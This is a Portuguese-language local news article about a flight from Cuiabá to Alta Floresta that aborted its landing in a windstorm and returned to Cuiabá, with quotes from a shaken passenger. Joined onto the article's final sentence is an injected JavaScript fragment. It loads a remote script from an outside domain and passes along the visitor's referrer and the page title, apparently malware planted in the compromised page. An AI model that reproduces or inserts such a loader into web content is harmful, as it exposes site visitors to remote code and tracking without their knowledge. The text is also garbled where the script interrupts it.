Capa / Em Destaque / Vento forte impede pouso em AF e obriga piloto a arremeter e voltar à Cuiabá

Vento forte impede pouso em AF e obriga piloto a arremeter e voltar à Cuiabá

img_3371Altair Nery

O avião que fazia a rota Cuiabá/Alta Floresta, com chegada programada para as 13:30hs desta quinta-feira, 25, teve que retornar à capital quando fazia os procedimentos de pouso no aeroporto local. Uma tempestade de chuva e vento caia no horário em que o avião desceria na pista do aeroporto local, atrapalhando o procedimento. “Foi um susto enorme”, disse um paciente que manteve contato com a nossa reportagem relatando momentos de angustia entre as pessoas que estavam a bordo. “Graças a Deus o piloto foi ágil e bem competente”, comemorou.
Segundo este passageiro, chovia muito na hora do incidente, mas ainda assim o avião havia feito todo o procedimento de aproximação da pista, inclusive já estava pousando quando uma rajada de vento “muito forte”, obrigou o comandante a arremeter, retornando em seguida para Cuiabá. “Depois deste susto, o piloto ainda tentou por uns 10 minutos pousar em Alta Floresta, mas decidiu retornar à Cuiabá. Todos nós estávamos assustados”, afirmou.
O avião que pousaria em Alta Floresta trazia em torno de 45 passageiros. Em solo, um número superior de passageiros aguardava para fazer a viagem no caminho inverso. Apesar do susto, ninguém se feriu.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top